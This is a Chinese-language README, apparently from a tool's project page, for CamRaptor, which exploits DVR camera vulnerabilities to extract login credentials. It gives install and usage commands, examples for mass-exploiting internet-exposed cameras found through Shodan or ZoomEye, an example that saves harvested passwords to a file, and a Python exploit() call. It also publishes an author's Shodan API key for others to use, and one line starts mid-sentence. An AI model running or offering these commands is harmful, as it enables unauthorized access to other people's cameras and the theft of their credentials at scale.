CamRaptor 是一个利用流行 DVR 摄像头多个漏洞来获取网络摄像头登录凭据的工具。
Novo、CeNova 和 QSee)中的漏洞。pip3 install git+https://github.com/EntySec/CamRaptor
要使用 CamRaptor,只需在终端中输入 camraptor。
usage: camraptor [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS]
[--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]
CamRaptor 是一个利用流行 DVR 摄像头多个漏洞来获取网络摄像头登录凭据的工具。
optional arguments:
-h, --help 显示此帮助信息并退出
-t, --threads 使用线程以实现最快工作。
-o OUTPUT, --output OUTPUT
将结果输出到文件。
-i INPUT, --input INPUT
输入地址文件。
-a ADDRESS, --address ADDRESS
单个地址。
--shodan SHODAN Shodan API 密钥,用于通过互联网利用设备。
--zoomeye ZOOMEYE ZoomEye API 密钥,用于通过互联网利用设备。
-p PAGES, --pages PAGES
你想从 ZoomEye 获取的页数。
利用单个摄像头
让我们只是为了好玩来破解我的摄像头。
camraptor -a 192.168.99.100
从互联网上利用摄像头
让我们尝试使用 Shodan 搜索引擎通过互联网利用摄像头,我们将使用 -t 选项进行快速利用。
camraptor -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD
注意: 给出的 Shodan API 密钥(PSKINdQe1GyxGgecYz2191H2JoS9qvgD)是我的 PRO API 密钥,你可以使用此密钥或你自己的密钥,可以免费使用我们所有的资源 :)
从输入文件中利用摄像头
让我们尝试使用已开放的摄像头数据库,并使用 -t 进行快速利用。
camraptor -t -i cameras.txt -o passwords.txt
注意: 它将通过地址利用 cameras.txt 列表中的所有摄像头,并将获取的所有密码保存到 passwords.txt 中。
CamRaptor 还拥有自己的 Python API,可以通过将 CamRaptor 导入你的代码来调用。
from camraptor import CamRaptor
以下是 CamRaptor 的所有基本函数,可用于利用指定的摄像头。
exploit(address) - 利用给定地址的单个摄像头。利用单个摄像头
from camraptor import CamRaptor
camraptor = CamRaptor()
creds = camraptor.exploit('192.168.99.100')
print(creds)